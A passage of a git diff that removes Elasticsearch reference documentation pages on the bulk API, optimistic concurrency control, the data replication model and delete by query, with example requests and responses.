APIs. The `index` parameter accepts a single -index name, or an `alias` which points to a single index. - -include::docs/data-replication.asciidoc[] - -include::docs/index_.asciidoc[] - -include::docs/get.asciidoc[] - -include::docs/delete.asciidoc[] - -include::docs/delete-by-query.asciidoc[] - -include::docs/update.asciidoc[] - -include::docs/update-by-query.asciidoc[] - -include::docs/multi-get.asciidoc[] - -include::docs/bulk.asciidoc[] - -include::docs/reindex.asciidoc[] - -include::docs/termvectors.asciidoc[] - -include::docs/multi-termvectors.asciidoc[] - -include::docs/refresh.asciidoc[] - -include::docs/concurrency-control.asciidoc[] diff --git a/docs/reference/docs/bulk.asciidoc b/docs/reference/docs/bulk.asciidoc deleted file mode 100644 index 4c812bbc669..00000000000 --- a/docs/reference/docs/bulk.asciidoc +++ /dev/null @@ -1,752 +0,0 @@ -[[docs-bulk]] -=== Bulk API -++++ -Bulk -++++ - -Performs multiple indexing or delete operations in a single API call. -This reduces overhead and can greatly increase indexing speed. - -[source,console] --------------------------------------------------- -POST _bulk -{ "index" : { "_index" : "test", "_id" : "1" } } -{ "field1" : "value1" } -{ "delete" : { "_index" : "test", "_id" : "2" } } -{ "create" : { "_index" : "test", "_id" : "3" } } -{ "field1" : "value3" } -{ "update" : {"_id" : "1", "_index" : "test"} } -{ "doc" : {"field2" : "value2"} } --------------------------------------------------- - -[[docs-bulk-api-request]] -==== {api-request-title} - -`POST /_bulk` - -`POST //_bulk` - -[[docs-bulk-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** To use the `create` action, you must have the `create_doc`, `create`, -`index`, or `write` index privilege. Data streams support only the `create` -action. - -** To use the `index` action, you must have the `create`, `index`, or `write` -index privilege. - -** To use the `delete` action, you must have the `delete` or `write` index -privilege. - -** To use the `update` action, you must have the `index` or `write` index -privilege. - -** To automatically create a data stream or index with a bulk API request, you -must have the `auto_configure`, `create_index`, or `manage` index privilege. - -* Automatic data stream creation requires a matching index template with data -stream enabled. See <>. - -[[docs-bulk-api-desc]] -==== {api-description-title} - -Provides a way to perform multiple `index`, `create`, `delete`, and `update` actions in a single request. - -The actions are specified in the request body using a newline delimited JSON (NDJSON) structure: - -[source,js] --------------------------------------------------- -action_and_meta_data\n -optional_source\n -action_and_meta_data\n -optional_source\n -.... -action_and_meta_data\n -optional_source\n --------------------------------------------------- -// NOTCONSOLE - -The `index` and `create` actions expect a source on the next line, -and have the same semantics as the `op_type` parameter in the standard index API: -`create` fails if a document with the same ID already exists in the target, -`index` adds or replaces a document as necessary. - -NOTE: <> support only the `create` action. To update -or delete a document in a data stream, you must target the backing index -containing the document. See <>. - -`update` expects that the partial doc, upsert, -and script and its options are specified on the next line. - -`delete` does not expect a source on the next line and -has the same semantics as the standard delete API. - -[NOTE] -==== -The final line of data must end with a newline character `\n`. -Each newline character may be preceded by a carriage return `\r`. -When sending requests to the `_bulk` endpoint, -the `Content-Type` header should be set to `application/x-ndjson`. -==== - -Because this format uses literal `\n`'s as delimiters, -make sure that the JSON actions and sources are not pretty printed. - -If you provide a `` in the request path, -it is used for any actions that don't explicitly specify an `_index` argument. - -A note on the format: The idea here is to make processing of this as -fast as possible. As some of the actions are redirected to other -shards on other nodes, only `action_meta_data` is parsed on the -receiving node side. - -Client libraries using this protocol should try and strive to do -something similar on the client side, and reduce buffering as much as -possible. - -There is no "correct" number of actions to perform in a single bulk request. -Experiment with different settings to find the optimal size for your particular workload. - -When using the HTTP API, make sure that the client does not send HTTP chunks, -as this will slow things down. - -[discrete] -[[bulk-clients]] -===== Client support for bulk requests - -Some of the officially supported clients provide helpers to assist with -bulk requests and reindexing: - -Go:: - - See https://github.com/elastic/go-elasticsearch/tree/master/_examples/bulk#indexergo[esutil.BulkIndexer] - -Perl:: - - See https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Bulk[Search::Elasticsearch::Client::5_0::Bulk] - and https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Scroll[Search::Elasticsearch::Client::5_0::Scroll] - -Python:: - - See https://elasticsearch-py.readthedocs.org/en/master/helpers.html[elasticsearch.helpers.*] - -JavaScript:: - - See {jsclient-current}/client-helpers.html[client.helpers.*] - -.NET:: - See https://www.elastic.co/guide/en/elasticsearch/client/net-api/current/indexing-documents.html#bulkall-observable[`BulkAllObservable`] - -[discrete] -[[bulk-curl]] -===== Submitting bulk requests with cURL - -If you're providing text file input to `curl`, you *must* use the -`--data-binary` flag instead of plain `-d`. The latter doesn't preserve -newlines. Example: - -[source,js] --------------------------------------------------- -$ cat requests -{ "index" : { "_index" : "test", "_id" : "1" } } -{ "field1" : "value1" } -$ curl -s -H "Content-Type: application/x-ndjson" -XPOST localhost:9200/_bulk --data-binary "@requests"; echo -{"took":7, "errors": false, "items":[{"index":{"_index":"test","_type":"_doc","_id":"1","_version":1,"result":"created","forced_refresh":false}}]} --------------------------------------------------- -// NOTCONSOLE -// Not converting to console because this shows how curl works - -[discrete] -[[bulk-optimistic-concurrency-control]] -===== Optimistic concurrency control - -Each `index` and `delete` action within a bulk API call may include the -`if_seq_no` and `if_primary_term` parameters in their respective action -and meta data lines. The `if_seq_no` and `if_primary_term` parameters control -how operations are executed, based on the last modification to existing -documents. See <> for more details. - - -[discrete] -[[bulk-versioning]] -===== Versioning - -Each bulk item can include the version value using the -`version` field. It automatically follows the behavior of the -index / delete operation based on the `_version` mapping. It also -support the `version_type` (see <>). - -[discrete] -[[bulk-routing]] -===== Routing - -Each bulk item can include the routing value using the -`routing` field. It automatically follows the behavior of the -index / delete operation based on the `_routing` mapping. - -NOTE: Data streams do not support custom routing. Instead, target the -appropriate backing index for the stream. - -[discrete] -[[bulk-wait-for-active-shards]] -===== Wait for active shards - -When making bulk calls, you can set the `wait_for_active_shards` -parameter to require a minimum number of shard copies to be active -before starting to process the bulk request. See -<> for further details and a usage -example. - -[discrete] -[[bulk-refresh]] -===== Refresh - -Control when the changes made by this request are visible to search. See -<>. - -NOTE: Only the shards that receive the bulk request will be affected by -`refresh`. Imagine a `_bulk?refresh=wait_for` request with three -documents in it that happen to be routed to different shards in an index -with five shards. The request will only wait for those three shards to -refresh. The other two shards that make up the index do not -participate in the `_bulk` request at all. - -[discrete] -[[bulk-security]] -===== Security - -See <>. - -[[docs-bulk-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Name of the data stream, index, or index alias to perform bulk actions -on. - -[[docs-bulk-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -`require_alias`:: -(Optional, Boolean) -If `true`, the request's actions must target an <>. -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -`timeout`:: -+ --- -(Optional, <>) -Period each action waits for the following operations: - -* <> -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[bulk-api-request-body]] -==== {api-request-body-title} -The request body contains a newline-delimited list of `create`, `delete`, `index`, -and `update` actions and their associated source data. - -`create`:: -(Optional, string) -Indexes the specified document if it does not already exist. -The following line must contain the source data to be indexed. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`delete`:: -(Optional, string) -Removes the specified document from the index. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -`_id`:: -(Required, string) -The document ID. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`index`:: -(Optional, string) -Indexes the specified document. -If the document exists, replaces the document and increments the version. -The following line must contain the source data to be indexed. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`update`:: -(Optional, string) -Performs a partial document update. -The following line must contain the partial document and update options. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`doc`:: -(Optional, object) -The partial document to index. -Required for `update` operations. - -``:: -(Optional, object) -The document source to index. -Required for `create` and `index` operations. - -[role="child_attributes"] -[[bulk-api-response-body]] -==== {api-response-body-title} - -The bulk API's response contains the individual results of each operation in the -request, returned in the order submitted. The success or failure of an -individual operation does not affect other operations in the request. - -[[bulk-partial-responses]] -.Partial responses -**** -To ensure fast responses, the bulk API will respond with partial results if one -or more shards fail. See <> for more -information. -**** - -`took`:: -(integer) -How long, in milliseconds, it took to process the bulk request. - -`errors`:: -(Boolean) -If `true`, one or more of the operations in the bulk request did not complete -successfully. - -`items`:: -(array of objects) -Contains the result of each operation in the bulk request, in the order they -were submitted. -+ -.Properties of `items` objects -[%collapsible%open] -==== -:: -(object) -The parameter name is an action associated with the operation. Possible values -are `create`, `delete`, `index`, and `update`. -+ -The parameter value is an object that contains information for the associated -operation. -+ -.Properties of `` -[%collapsible%open] -===== -`_index`:: -(string) -Name of the index associated with the operation. If the operation targeted a -data stream, this is the backing index into which the document was written. - -`_type`:: -(string) -The document type associated with the operation. {es} indices now support a -single document type: `_doc`. See <>. - -`_id`:: -(integer) -The document ID associated with the operation. - -`_version`:: -(integer) -The document version associated with the operation. The document version is -incremented each time the document is updated. -+ -This parameter is only returned for successful actions. - -`result`:: -(string) -Result of the operation. Successful values are `created`, `deleted`, and -`updated`. -+ -This parameter is only returned for successful operations. - -`_shards`:: -(object) -Contains shard information for the operation. -+ -This parameter is only returned for successful operations. -+ -.Properties of `_shards` -[%collapsible%open] -====== -`total`:: -(integer) -Number of shards the operation attempted to execute on. - -`successful`:: -(integer) -Number of shards the operation succeeded on. - -`failed`:: -(integer) -Number of shards the operation attempted to execute on but failed. -====== - -`_seq_no`:: -(integer) -The sequence number assigned to the document for the operation. -Sequence numbers are used to ensure an older version of a document -doesn’t overwrite a newer version. See <>. -+ -This parameter is only returned for successful operations. - -`_primary_term`:: -(integer) -The primary term assigned to the document for the operation. -See <>. -+ -This parameter is only returned for successful operations. - -`status`:: -(integer) -HTTP status code returned for the operation. - -`error`:: -(object) -Contains additional information about the failed operation. -+ -The parameter is only returned for failed operations. -+ -.Properties of `error` -[%collapsible%open] -====== -`type`:: -(string) -Error type for the operation. - -`reason`:: -(string) -Reason for the failed operation. - -`index_uuid`:: -(string) -The universally unique identifier (UUID) of the index associated with the failed -operation. - -`shard`:: -(string) -ID of the shard associated with the failed operation. - -`index`:: -(string) -Name of the index associated with the failed operation. If the operation -targeted a data stream, this is the backing index into which the document was -attempted to be written. -====== -===== -==== - -[[docs-bulk-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _bulk -{ "index" : { "_index" : "test", "_id" : "1" } } -{ "field1" : "value1" } -{ "delete" : { "_index" : "test", "_id" : "2" } } -{ "create" : { "_index" : "test", "_id" : "3" } } -{ "field1" : "value3" } -{ "update" : {"_id" : "1", "_index" : "test"} } -{ "doc" : {"field2" : "value2"} } --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "took": 30, - "errors": false, - "items": [ - { - "index": { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 201, - "_seq_no" : 0, - "_primary_term": 1 - } - }, - { - "delete": { - "_index": "test", - "_type": "_doc", - "_id": "2", - "_version": 1, - "result": "not_found", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 404, - "_seq_no" : 1, - "_primary_term" : 2 - } - }, - { - "create": { - "_index": "test", - "_type": "_doc", - "_id": "3", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 201, - "_seq_no" : 2, - "_primary_term" : 3 - } - }, - { - "update": { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 2, - "result": "updated", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 200, - "_seq_no" : 3, - "_primary_term" : 4 - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 30/"took": $body.took/] -// TESTRESPONSE[s/"index_uuid": .../"index_uuid": $body.items.3.update.error.index_uuid/] -// TESTRESPONSE[s/"_seq_no" : 0/"_seq_no" : $body.items.0.index._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 1/"_primary_term" : $body.items.0.index._primary_term/] -// TESTRESPONSE[s/"_seq_no" : 1/"_seq_no" : $body.items.1.delete._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 2/"_primary_term" : $body.items.1.delete._primary_term/] -// TESTRESPONSE[s/"_seq_no" : 2/"_seq_no" : $body.items.2.create._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 3/"_primary_term" : $body.items.2.create._primary_term/] -// TESTRESPONSE[s/"_seq_no" : 3/"_seq_no" : $body.items.3.update._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 4/"_primary_term" : $body.items.3.update._primary_term/] - -[discrete] -[[bulk-update]] -===== Bulk update example - -When using the `update` action, `retry_on_conflict` can be used as a field in -the action itself (not in the extra payload line), to specify how many -times an update should be retried in the case of a version conflict. - -The `update` action payload supports the following options: `doc` -(partial document), `upsert`, `doc_as_upsert`, `script`, `params` (for -script), `lang` (for script), and `_source`. See update documentation for details on -the options. Example with update actions: - -[source,console] --------------------------------------------------- -POST _bulk -{ "update" : {"_id" : "1", "_index" : "index1", "retry_on_conflict" : 3} } -{ "doc" : {"field" : "value"} } -{ "update" : { "_id" : "0", "_index" : "index1", "retry_on_conflict" : 3} } -{ "script" : { "source": "ctx._source.counter += params.param1", "lang" : "painless", "params" : {"param1" : 1}}, "upsert" : {"counter" : 1}} -{ "update" : {"_id" : "2", "_index" : "index1", "retry_on_conflict" : 3} } -{ "doc" : {"field" : "value"}, "doc_as_upsert" : true } -{ "update" : {"_id" : "3", "_index" : "index1", "_source" : true} } -{ "doc" : {"field" : "value"} } -{ "update" : {"_id" : "4", "_index" : "index1"} } -{ "doc" : {"field" : "value"}, "_source": true} --------------------------------------------------- - -[discrete] -[[bulk-failures-ex]] -===== Example with failed actions - -The following bulk API request includes operations that update non-existent -documents. - -[source,console] ----- -POST /_bulk -{ "update": {"_id": "5", "_index": "index1"} } -{ "doc": {"my_field": "foo"} } -{ "update": {"_id": "6", "_index": "index1"} } -{ "doc": {"my_field": "foo"} } -{ "create": {"_id": "7", "_index": "index1"} } -{ "my_field": "foo" } ----- - -Because these operations cannot complete successfully, the API returns a -response with an `errors` flag of `true`. - -The response also includes an `error` object for any failed operations. The -`error` object contains additional information about the failure, such as the -error type and reason. - -[source,console-result] ----- -{ - "took": 486, - "errors": true, - "items": [ - { - "update": { - "_index": "index1", - "_type" : "_doc", - "_id": "5", - "status": 404, - "error": { - "type": "document_missing_exception", - "reason": "[_doc][5]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - }, - { - "update": { - "_index": "index1", - "_type" : "_doc", - "_id": "6", - "status": 404, - "error": { - "type": "document_missing_exception", - "reason": "[_doc][6]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - }, - { - "create": { - "_index": "index1", - "_type" : "_doc", - "_id": "7", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 0, - "_primary_term": 1, - "status": 201 - } - } - ] -} ----- -// TESTRESPONSE[s/"took": 486/"took": $body.took/] -// TESTRESPONSE[s/"_seq_no": 0/"_seq_no": $body.items.2.create._seq_no/] -// TESTRESPONSE[s/"index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA"/"index_uuid": $body.$_path/] - -To return only information about failed operations, use the -<> query parameter with an -argument of `items.*.error`. - -[source,console] ----- -POST /_bulk?filter_path=items.*.error -{ "update": {"_id": "5", "_index": "index1"} } -{ "doc": {"my_field": "baz"} } -{ "update": {"_id": "6", "_index": "index1"} } -{ "doc": {"my_field": "baz"} } -{ "update": {"_id": "7", "_index": "index1"} } -{ "doc": {"my_field": "baz"} } ----- -// TEST[continued] - -The API returns the following result. - -[source,console-result] ----- -{ - "items": [ - { - "update": { - "error": { - "type": "document_missing_exception", - "reason": "[_doc][5]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - }, - { - "update": { - "error": { - "type": "document_missing_exception", - "reason": "[_doc][6]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - } - ] -} ----- -// TESTRESPONSE[s/"index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA"/"index_uuid": $body.$_path/] diff --git a/docs/reference/docs/concurrency-control.asciidoc b/docs/reference/docs/concurrency-control.asciidoc deleted file mode 100644 index c399f6063ab..00000000000 --- a/docs/reference/docs/concurrency-control.asciidoc +++ /dev/null @@ -1,113 +0,0 @@ -[[optimistic-concurrency-control]] -=== Optimistic concurrency control - -Elasticsearch is distributed. When documents are created, updated, or deleted, -the new version of the document has to be replicated to other nodes in the cluster. -Elasticsearch is also asynchronous and concurrent, meaning that these replication -requests are sent in parallel, and may arrive at their destination out of sequence. -Elasticsearch needs a way of ensuring that an older version of a document never -overwrites a newer version. - - -To ensure an older version of a document doesn't overwrite a newer version, every -operation performed to a document is assigned a sequence number by the primary -shard that coordinates that change. The sequence number is increased with each -operation and thus newer operations are guaranteed to have a higher sequence -number than older operations. Elasticsearch can then use the sequence number of -operations to make sure a newer document version is never overridden by -a change that has a smaller sequence number assigned to it. - -For example, the following indexing command will create a document and assign it -an initial sequence number and primary term: - -[source,console] --------------------------------------------------- -PUT products/_doc/1567 -{ - "product" : "r2d2", - "details" : "A resourceful astromech droid" -} --------------------------------------------------- - -You can see the assigned sequence number and primary term in the -`_seq_no` and `_primary_term` fields of the response: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 1 - }, - "_index": "products", - "_type": "_doc", - "_id": "1567", - "_version": 1, - "_seq_no": 362, - "_primary_term": 2, - "result": "created" -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": 362/"_seq_no": $body._seq_no/] -// TESTRESPONSE[s/"_primary_term": 2/"_primary_term": $body._primary_term/] - - -Elasticsearch keeps tracks of the sequence number and primary term of the last -operation to have changed each of the documents it stores. The sequence number -and primary term are returned in the `_seq_no` and `_primary_term` fields in -the response of the <>: - -[source,console] --------------------------------------------------- -GET products/_doc/1567 --------------------------------------------------- -// TEST[continued] - -returns: - -[source,console-result] --------------------------------------------------- -{ - "_index": "products", - "_type": "_doc", - "_id": "1567", - "_version": 1, - "_seq_no": 362, - "_primary_term": 2, - "found": true, - "_source": { - "product": "r2d2", - "details": "A resourceful astromech droid" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": 362/"_seq_no": $body._seq_no/] -// TESTRESPONSE[s/"_primary_term": 2/"_primary_term": $body._primary_term/] - - -Note: The <> can return the `_seq_no` and `_primary_term` -for each search hit by setting <>. - -The sequence number and the primary term uniquely identify a change. By noting down -the sequence number and primary term returned, you can make sure to only change the -document if no other change was made to it since you retrieved it. This -is done by setting the `if_seq_no` and `if_primary_term` parameters of the -<>, <>, or <>. - -For example, the following indexing call will make sure to add a tag to the -document without losing any potential change to the description or an addition -of another tag by another API: - -[source,console] --------------------------------------------------- -PUT products/_doc/1567?if_seq_no=362&if_primary_term=2 -{ - "product": "r2d2", - "details": "A resourceful astromech droid", - "tags": [ "droid" ] -} --------------------------------------------------- -// TEST[continued] -// TEST[catch: conflict] diff --git a/docs/reference/docs/data-replication.asciidoc b/docs/reference/docs/data-replication.asciidoc deleted file mode 100644 index 54bbe0ca605..00000000000 --- a/docs/reference/docs/data-replication.asciidoc +++ /dev/null @@ -1,173 +0,0 @@ - -[[docs-replication]] -=== Reading and Writing documents - -[discrete] -==== Introduction - -Each index in Elasticsearch is <> -and each shard can have multiple copies. These copies are known as a _replication group_ and must be kept in sync when documents -are added or removed. If we fail to do so, reading from one copy will result in very different results than reading from another. -The process of keeping the shard copies in sync and serving reads from them is what we call the _data replication model_. - -Elasticsearch’s data replication model is based on the _primary-backup model_ and is described very well in the -https://www.microsoft.com/en-us/research/publication/pacifica-replication-in-log-based-distributed-storage-systems/[PacificA paper] of -Microsoft Research. That model is based on having a single copy from the replication group that acts as the primary shard. -The other copies are called _replica shards_. The primary serves as the main entry point for all indexing operations. It is in charge of -validating them and making sure they are correct. Once an index operation has been accepted by the primary, the primary is also -responsible for replicating the operation to the other copies. - -This purpose of this section is to give a high level overview of the Elasticsearch replication model and discuss the implications -it has for various interactions between write and read operations. - -[discrete] -[[basic-write-model]] -==== Basic write model - -Every indexing operation in Elasticsearch is first resolved to a replication group using <>, -typically based on the document ID. Once the replication group has been determined, the operation is forwarded -internally to the current _primary shard_ of the group. This stage of indexing is referred to as the _coordinating stage_. - -The next stage of indexing is the _primary stage_, performed on the primary shard. The primary shard is responsible -for validating the operation and forwarding it to the other replicas. Since replicas can be offline, the primary -is not required to replicate to all replicas. Instead, Elasticsearch maintains a list of shard copies that should -receive the operation. This list is called the _in-sync copies_ and is maintained by the master node. As the name implies, -these are the set of "good" shard copies that are guaranteed to have processed all of the index and delete operations that -have been acknowledged to the user. The primary is responsible for maintaining this invariant and thus has to replicate all -operations to each copy in this set. - -The primary shard follows this basic flow: - -. Validate incoming operation and reject it if structurally invalid (Example: have an object field where a number is expected) -. Execute the operation locally i.e. indexing or deleting the relevant document. This will also validate the content of fields - and reject if needed (Example: a keyword value is too long for indexing in Lucene). -. Forward the operation to each replica in the current in-sync copies set. If there are multiple replicas, this is done in parallel. -. Once all replicas have successfully performed the operation and responded to the primary, the primary acknowledges the successful - completion of the request to the client. - -Each in-sync replica copy performs the indexing operation locally so that it has a copy. This stage of indexing is the -_replica stage_. - -These indexing stages (coordinating, primary, and replica) are sequential. To enable internal retries, the lifetime of each stage -encompasses the lifetime of each subsequent stage. For example, the coordinating stage is not complete until each primary -stage, which may be spread out across different primary shards, has completed. Each primary stage will not complete until the -in-sync replicas have finished indexing the docs locally and responded to the replica requests. - -[discrete] -===== Failure handling - -Many things can go wrong during indexing -- disks can get corrupted, nodes can be disconnected from each other, or some -configuration mistake could cause an operation to fail on a replica despite it being successful on the primary. These -are infrequent but the primary has to respond to them. - -In the case that the primary itself fails, the node hosting the primary will send a message to the master about it. The indexing -operation will wait (up to 1 minute, by <>) for the master to promote one of the replicas to be a -new primary. The operation will then be forwarded to the new primary for processing. Note that the master also monitors the -health of the nodes and may decide to proactively demote a primary. This typically happens when the node holding the primary -is isolated from the cluster by a networking issue. See <> for more details. - -Once the operation has been successfully performed on the primary, the primary has to deal with potential failures -when executing it on the replica shards. This may be caused by an actual failure on the replica or due to a network -issue preventing the operation from reaching the replica (or preventing the replica from responding). All of these -share the same end result: a replica which is part of the in-sync replica set misses an operation that is about to -be acknowledged. In order to avoid violating the invariant, the primary sends a message to the master requesting -that the problematic shard be removed from the in-sync replica set. Only once removal of the shard has been acknowledged -by the master does the primary acknowledge the operation. Note that the master will also instruct another node to start -building a new shard copy in order to restore the system to a healthy state. - -[[demoted-primary]] -While forwarding an operation to the replicas, the primary will use the replicas to validate that it is still the -active primary. If the primary has been isolated due to a network partition (or a long GC) it may continue to process -incoming indexing operations before realising that it has been demoted. Operations that come from a stale primary -will be rejected by the replicas. When the primary receives a response from the replica rejecting its request because -it is no longer the primary then it will reach out to the master and will learn that it has been replaced. The -operation is then routed to the new primary. - -.What happens if there are no replicas? -************ -This is a valid scenario that can happen due to index configuration or simply -because all the replicas have failed. In that case the primary is processing operations without any external validation, -which may seem problematic. On the other hand, the primary cannot fail other shards on its own but request the master to do -so on its behalf. This means that the master knows that the primary is the only single good copy. We are therefore guaranteed -that the master will not promote any other (out-of-date) shard copy to be a new primary and that any operation indexed -into the primary will not be lost. Of course, since at that point we are running with only single copy of the data, physical hardware -issues can cause data loss. See <> for some mitigation options. -************ - -[discrete] -==== Basic read model - -Reads in Elasticsearch can be very lightweight lookups by ID or a heavy search request with complex aggregations that -take non-trivial CPU power. One of the beauties of the primary-backup model is that it keeps all shard copies identical -(with the exception of in-flight operations). As such, a single in-sync copy is sufficient to serve read requests. - -When a read request is received by a node, that node is responsible for forwarding it to the nodes that hold the relevant shards, -collating the responses, and responding to the client. We call that node the _coordinating node_ for that request. The basic flow -is as follows: - -. Resolve the read requests to the relevant shards. Note that since most searches will be sent to one or more indices, - they typically need to read from multiple shards, each representing a different subset of the data. -. Select an active copy of each relevant shard, from the shard replication group. This can be either the primary or - a replica. By default, {es} uses <> to select the shard copies. -. Send shard level read requests to the selected copies. -. Combine the results and respond. Note that in the case of get by ID look up, only one shard is relevant and this step can be skipped. - -[discrete] -[[shard-failures]] -===== Shard failures - -When a shard fails to respond to a read request, the coordinating node sends the -request to another shard copy in the same replication group. Repeated failures -can result in no available shard copies. - -To ensure fast responses, the following APIs will -respond with partial results if one or more shards fail: - -* <> -* <> -* <> -* <> - -Responses containing partial results still provide a `200 OK` HTTP status code. -Shard failures are indicated by the `timed_out` and `_shards` fields of -the response header. - -[discrete] -==== A few simple implications - -Each of these basic flows determines how Elasticsearch behaves as a system for both reads and writes. Furthermore, since read -and write requests can be executed concurrently, these two basic flows interact with each other. This has a few inherent implications: - -Efficient reads:: Under normal operation each read operation is performed once for each relevant replication group. - Only under failure conditions do multiple copies of the same shard execute the same search. - -Read unacknowledged:: Since the primary first indexes locally and then replicates the request, it is possible for a - concurrent read to already see the change before it has been acknowledged. - -Two copies by default:: This model can be fault tolerant while maintaining only two copies of the data. This is in contrast to - quorum-based system where the minimum number of copies for fault tolerance is 3. - -[discrete] -==== Failures - -Under failures, the following is possible: - -A single shard can slow down indexing:: Because the primary waits for all replicas in the in-sync copies set during each operation, - a single slow shard can slow down the entire replication group. This is the price we pay for the read efficiency mentioned above. - Of course a single slow shard will also slow down unlucky searches that have been routed to it. - -Dirty reads:: An isolated primary can expose writes that will not be acknowledged. This is caused by the fact that an isolated - primary will only realize that it is isolated once it sends requests to its replicas or when reaching out to the master. - At that point the operation is already indexed into the primary and can be read by a concurrent read. Elasticsearch mitigates - this risk by pinging the master every second (by default) and rejecting indexing operations if no master is known. - -[discrete] -==== The Tip of the Iceberg - -This document provides a high level overview of how Elasticsearch deals with data. Of course, there is much much more -going on under the hood. Things like primary terms, cluster state publishing, and master election all play a role in -keeping this system behaving correctly. This document also doesn't cover known and important -bugs (both closed and open). We recognize that https://github.com/elastic/elasticsearch/issues?q=label%3Aresiliency[GitHub is hard to keep up with]. -To help people stay on top of those, we maintain a dedicated https://www.elastic.co/guide/en/elasticsearch/resiliency/current/index.html[resiliency page] -on our website. We strongly advise reading it. diff --git a/docs/reference/docs/delete-by-query.asciidoc b/docs/reference/docs/delete-by-query.asciidoc deleted file mode 100644 index 43f423018b9..00000000000 --- a/docs/reference/docs/delete-by-query.asciidoc +++ /dev/null @@ -1,691 +0,0 @@ -[[docs-delete-by-query]] -=== Delete by query API -++++ -Delete by query -++++ - -Deletes documents that match the specified query. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_delete_by_query -{ - "query": { - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -//// - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "deleted": 119, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "total": 119, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 147/"took" : "$body.took"/] -//// - -[[docs-delete-by-query-api-request]] -==== {api-request-title} - -`POST //_delete_by_query` - -[[docs-delete-by-query-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** `read` -** `delete` or `write` - -[[docs-delete-by-query-api-desc]] -==== {api-description-title} - -You can specify the query criteria in the request URI or the request body -using the same syntax as the <>. - -When you submit a delete by query request, {es} gets a snapshot of the data stream or index -when it begins processing the request and deletes matching documents using -`internal` versioning. If a document changes between the time that the -snapshot is taken and the delete operation is processed, it results in a version -conflict and the delete operation fails. - -NOTE: Documents with a version equal to 0 cannot be deleted using delete by -query because `internal` versioning does not support 0 as a valid -version number. - -While processing a delete by query request, {es} performs multiple search -requests sequentially to find all of the matching documents to delete. A bulk -delete request is performed for each batch of matching documents. If a -search or bulk request is rejected, the requests are retried up to 10 times, with -exponential back off. If the maximum retry limit is reached, processing halts -and all failed requests are returned in the response. Any delete requests that -completed successfully still stick, they are not rolled back. - -You can opt to count version conflicts instead of halting and returning by -setting `conflicts` to `proceed`. - -===== Refreshing shards - -Specifying the `refresh` parameter refreshes all shards involved in the delete -by query once the request completes. This is different than the delete API's -`refresh` parameter, which causes just the shard that received the delete -request to be refreshed. 